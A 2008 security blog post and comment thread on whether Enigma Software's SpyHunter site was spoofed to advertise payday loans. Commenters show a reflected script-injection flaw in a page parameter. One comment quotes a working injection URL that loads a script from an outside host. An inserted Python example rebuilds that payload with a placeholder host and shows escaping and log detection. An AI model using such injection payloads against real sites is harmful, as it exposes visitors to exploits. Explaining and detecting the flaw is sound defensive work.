Enigma software, have they been spoofed

by certifiedbug on May 21, 2008

in Internet Security

I have no doubt there will be more to follow… Stay tuned.

[Screenshots (image alt text: "enigma")]

{ 1 trackback }

Security Cadets » Enigma Software Group Update
May 22, 2008 at 11:46 am

{ 22 comments }

1 Enigma Software Group USA, LLC May 22, 2008 at 12:41 pm

You are spreading false rumors on your site

This image is a fake that was made with the sole intent to damage our reputation.

http://certifiedbug.com/blog/wp-content/enigmasoftware4.png

2 Enigma Software Group USA, LLC May 22, 2008 at 12:45 pm

Enigma is not in the credit business and Enigma has not been spoofed, and there are false statements and images on this webpage http://certifiedbug.com/blog/2008/05/21/enigmasoftware-payday-loan/. There are images suggesting to readers of your site that our web site and servers have been compromised, and that our software is scanning for bad credit and offering payday loans. The image suggesting that SpyHunter will scan the entire computer to detect negative credit is a fake image. It was never on our servers.

Fake Image URL: http://certifiedbug.com/blog/wp-content/enigmasoftware4.png

As for the URL and title referenced in the article: our pages are dynamically generated, where you can pass parameters and the page will have the title and other keywords based on the querystring keyword or phrase passed through to it. For example, in the page you are describing, http://www.enigmasoftware.com/spyhunter_more_info.php?n=xxxx will change the content inside the title tags to xxxx. This is a common practice in most dynamically generated content on most content management systems.

Someone created an account on a China expatriate forum that made only one post, with a link on this page http://www.alloexpat.com/china_expat_forum/member56188.html to a non-existent page on our server which was then dynamically generated. The page, which subsequently showed up in Google, has text relating to payday loans.

This whole situation then became blown out of proportion, with someone under the alias of JeanInMontana making accusations that we are using data that we collect for phishing and spam. These accusations are false and entirely baseless.

Enigma Software Group USA, LLC is not in the loan business.

3 certifiedbug May 22, 2008 at 1:16 pm

“You are spreading false rumors on your site

This image is a fake that was made with the sole intent to damage our reputation.”

On the contrary, this site was spammed with links to the site from which I took the screenshots yesterday.

Which is why I wondered if the site had been spoofed.

I see the exact same links now redirect to a legitimate page.

4 ShadowPuterDude May 22, 2008 at 1:19 pm

Google is your friend:
hxxp://www.google.com/search?hl=en&q=%22Scan+your+entire+computer+to+detect+negative+credit+-+Payday+loan&btnG=Search

Sorry, Enigma Software Group USA, LLC; but the fact is your page did say that until recently.

5 Steven May 22, 2008 at 1:23 pm

Trust me, you don’t need us to damage your reputation – ESG do that all by themselves ……..

And nope, the image is NOT a fake …… many of us witnessed the same thing. All you have done, to prevent this being seen, is fix the bug in your site that allowed script injection.

Previously, someone had attempted to redirect victims to an exploit via your website. Since your site was not correctly filtering HTML code, the following, with JavaScript disabled, displayed what is shown in the screenshot posted by CB, and, with JS enabled, took the victim to the exploit:

hxxx://www.enigmasoftware.com/spyhunter_more_info.php?n=negative%20credit%20-%20Payday%20loan%20-%20Up%20to%202500$%20Next%20day%20in%20your%20Bank%20account%20payday%20loan%3Cscript%20src=http://cmiia.com/o9.js%3E%3C/script%3E

Since you’ve fixed this, it now correctly leads to:

spyhunter_more_info.php

We’re not stupid Alvin ;o)

6 Alvin Estevez May 22, 2008 at 2:36 pm

“Trust me, you don’t need us to damage your reputation – ESG do that all by themselves”

Steven, I remember you from other conversations; that is your opinion and irrelevant to what we are discussing. We are aware of your opinions on us. Our loyal customers do not share your opinion. I think your issue with us is almost like a personal obsession. I would advise that we please stick to the issues. For example, the issue of the page with the exploited querystring (n=…..). Let’s address that.

7 Enigma Software Group USA, LLC May 22, 2008 at 2:39 pm

You are correct, the page was there. It was simply what we had previously stated:

Enigma landing pages are dynamically generated, where you can pass parameters and the page will have the title and other keywords based on the querystring keyword or phrase passed through to it. For example, in the page you are describing, http://www.enigmasoftware.com/spyhunter_more_info.php?n=xxxx will change the content inside the title tags to xxxx. This is a common practice in most dynamically generated content on most content management systems.

Someone started spamming links on sites such as a China expatriate forum (http://www.alloexpat.com/china_expat_forum/member56188.html) to an invalid URL on our server which was then dynamically generated. The page, which subsequently showed up in Google, had text relating to payday loans. This is not our business and never was, nor are we interested in it.
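The mechanism described in comments 2, 5 and 7 (a querystring keyword echoed verbatim into the page title and body, which let a link carry a script tag), modelled as an added example that is not code from the original page or from Enigma's site. It assumes a Python rendering of the page's `n=` parameter, a constructed link whose script host is a placeholder, and constructed access-log lines; it shows the unescaped reflection beside the escaped form and a log-review check for requests that carried markup in that parameter.

```python
from html import escape
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the link quoted in the thread; the script host is a
# placeholder, not the address named in the comments.
PAYLOAD_PATH = ("/spyhunter_more_info.php?n=negative%20credit%20-%20Payday%20loan"
                "%3Cscript%20src=http://attacker.invalid/o9.js%3E%3C/script%3E")

# Constructed web-server log lines in Common Log Format.
ACCESS_LOG = [
    '203.0.113.7 - - [21/May/2008:10:01:02 +0000] "GET /spyhunter_more_info.php?n=xxxx HTTP/1.1" 200 512',
    f'203.0.113.9 - - [21/May/2008:10:05:44 +0000] "GET {PAYLOAD_PATH} HTTP/1.1" 200 640',
]


def keyword_from_path(path):
    """Decode the 'n' querystring value that the landing page echoes into its HTML."""
    return parse_qs(urlsplit(path).query, keep_blank_values=True).get("n", [""])[0]


def render_vulnerable(keyword):
    """Reflects the keyword verbatim into title and body, as the page did before the fix."""
    return f"<title>{keyword}</title><h1>{keyword}</h1>"


def render_fixed(keyword):
    """Escapes the keyword first, so any markup in it is displayed as text, not executed."""
    safe = escape(keyword, quote=True)
    return f"<title>{safe}</title><h1>{safe}</h1>"


def flag_injected_requests(log_lines):
    """Return the decoded 'n' values of requests that carried tag characters (log-review check)."""
    flagged = []
    for line in log_lines:
        request = line.split('"')[1]        # 'GET /path?query HTTP/1.1'
        path = request.split(" ")[1]
        keyword = keyword_from_path(path)
        if "<" in keyword or ">" in keyword:
            flagged.append(keyword)
    return flagged


if __name__ == "__main__":
    kw = keyword_from_path(PAYLOAD_PATH)
    print(render_vulnerable(kw))   # the script tag lands in the page as live markup
    print(render_fixed(kw))        # the same input is shown as &lt;script ...&gt; text
    print(flag_injected_requests(ACCESS_LOG))
```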

8 certifiedbug May 22, 2008 at 2:44 pm

The site I was at when I took the screenshots had a problem (for whatever reason); it obviously appears to be corrected now.

The same spammer who posted the link originally did it again today.

9 Alvin Estevez May 22, 2008 at 2:55 pm

ShadowPuterDude,

“Sorry, Enigma Software Group USA, LLC; but the fact is your page did say that until recently.”

The bottom-line:

As I stated before, that page had a parameter that was exploited by that forum poster, who linked to the page knowing that the page would display in the title and the body whatever he or she wanted to display.

By no means was that a server-level spoof. That was simply exploiting the known (n=…) querystring to manipulate the page.

We have no interest in the credit or loan business….

Anybody could have exploited that link for anything they wanted to exploit it for…. We corrected the problem as soon as my technical team became aware that they were doing it.

10 Alvin Estevez May 22, 2008 at 3:01 pm

Certifiedbug, we will investigate who this forum spammer who has it in for us is.. He or she will not be able to exploit that querystring anymore. We are exploring our options with our legal counsel.

11 certifiedbug May 22, 2008 at 3:12 pm

Do you want the spammer’s IP, Alvin Estevez?

12 Paperghost May 22, 2008 at 3:25 pm

Alvin, I have updated my blog post to say that despite the statement in the article I linked to which claims Enigma has changed its name, you have posted to confirm otherwise.

As for the above issue of the spammer and potential exploit redirection, would it not be beneficial in this case to work with Tashi with regard to tracking down and shutting down the spammers, if at all possible? It seems to me bringing this issue to light has actually been beneficial to yourselves, in terms of both making you aware of it and also giving you the chance to take action to shut this person down completely. Just a thought :)

13 Alvin Estevez May 22, 2008 at 3:40 pm

PaperGhost,

I wanted to speak to you at the Anti-Spyware Coalition consortium meeting last January of this year.

I was sitting in the audience and enjoyed some of the work you do with the young hackers.

I am willing to work with Tashi to find those spammers.

My only issue is, the IP can be bogus; what if they are using proxies or compromised computers? But at least it is a starting point….

Alvin

14 Alvin Estevez May 22, 2008 at 3:44 pm

Paperghost,

Is there a way for us to speak to you in private?

Alvin

15 Paperghost May 22, 2008 at 3:59 pm

Emailing me at Paperghost@vitalsecurity.org is the quickest way. It’s late here, but I will wait up for your message :)

16 ShadowPuterDude May 22, 2008 at 4:16 pm

Alvin,

I am quite familiar with Content Management Systems and dynamically generated web pages.

Some person or persons have taken advantage of a vulnerability in your software and exploited it. You have since corrected the vulnerability to prevent code injection.

That doesn’t change the fact that someone from your company falsely accused certifiedbug of posting fake images and spreading false rumors. Those pages did exist, with the content displayed, as posted in the article. I’ve seen them, 4 pages, including spyhunter_more_info.php.

Be thankful that the malicious redirect was ineffective. I’ve been to the redirect, to investigate. I won’t discuss the particulars of the attempted exploit in an open discussion that anyone, including the perpetrators, can view.

17 Alvin Estevez May 22, 2008 at 4:37 pm

ShadowPuterDude,

Do not post it here.. But what 4 other pages are exposed? And how can we communicate privately to discuss the particulars?

Thanks,

Alvin

18 Alvin Estevez May 22, 2008 at 4:53 pm

ShadowPuterDude,

“Some person or persons have taken advantage of a vulnerability in your software and exploited it.”

It was not my “Software” that was exploited, it was simply the page or pages to be exact.

Alvin

19 ShadowPuterDude May 22, 2008 at 5:33 pm

Alvin,
You can contact me at spd@malwareks.com, and I’ll give you the information I have.

If you use the vulnerable code on other pages, you will want to review your code, and notify the author of the CMS you use of the code injection vulnerability.

20 ShadowPuterDude May 22, 2008 at 6:47 pm

Correcting my mistyped email addy: spd@malwareteks.com

21 bonzo August 11, 2008 at 2:29 pm

While looking for a cure for XP Antivirus 2008 I found www.wiki-security.com. Except for no search function, it’s a pretty legitimate looking AV site. The weird thing is that every page has a download link for SpyHunter. It’s like some sort of covert ad for SpyHunter. The weirder thing is that when I clicked on a link to download the “free” software it’s blocked by our AV firewall tagging it as W32.JAKUZ, a known keylogger (Kaspersky).

22 certifiedbug August 11, 2008 at 6:46 pm

Hello bonzo,

I tested the download with two different AVs; neither alerted.

What do you mean by “our AV firewall” ? :)
Search on W32.JAKUZ at Kaspersky.

Not found
Phrase to find: “W32.JAKUZ”
Found: 0
